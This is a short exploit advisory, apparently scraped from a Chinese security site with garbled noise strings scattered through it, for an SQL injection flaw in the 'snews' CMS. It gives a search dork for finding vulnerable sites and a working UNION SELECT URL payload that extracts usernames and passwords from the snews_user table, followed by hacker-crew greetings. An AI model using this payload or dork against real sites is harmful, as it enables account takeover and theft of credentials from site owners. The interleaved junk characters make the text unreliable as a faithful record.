标题: CMS snews SQL Injection Vulnerability
/ w- ^- F9 F. f3 z7 |3 w& f5 ?作者: By onestree+ u5 w+ y+ x1 T" c) {& X
下载地址 : http://snewscms.com/
; J2 ~: F3 Q$ l1 M1 V& o- `5 B% h测试平台 : ubuntu 12.10 / win 7
: g9 h, |% x) ? a) _8 Q关键词: inurl:"tanyakan pada rumput yang bergoyang"
P1 `" i& N4 M$ ?( [! a * S2 Y3 t4 E3 f$ a8 J) h7 l( a
! A# y, P& ~$ z* f ]0 o3 _9 ?0 r7 ^5 S
*************************************************************" d7 n$ i% [8 n5 ^8 O, k0 G
1 ~ V, u$ _/ k0 D- O
SQL poc:
4 Y, D* _, K3 z- n3 ^3 M* b3 s$ h! i
( n' m- _9 u. _4 A6 i. l6 \/ Jhttp://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]
5 _ w3 y" h: m' X9 G- G) D
: S; U `8 T) [+ C" G* y/ c% ~4 @示例 s$ T% A& F" l8 c/ C4 \; w. ]' X" }3 T6 {
) U* m. \+ M! w; chttp://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*# w8 h5 S" b1 B9 B2 t- S0 \
O* I* |* f& q. U, A. L
# j" I$ t- E" f! o$ T. m+ _致谢:
8 x3 Q. e! J* i, Q 1 _: r3 u$ c1 o. m" V4 F5 F9 J
Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell+ R7 Z* z# P; v% Z0 \: H
2 ~: O5 u# l- n K5 T3 S4 V
indonesiancoder - moeslimh4x0r - go-coder: D5 w! a, l0 ^6 x! w T7 I
" b7 C6 G, b9 [
spesial my hunny :* u) R5 _7 \; \
|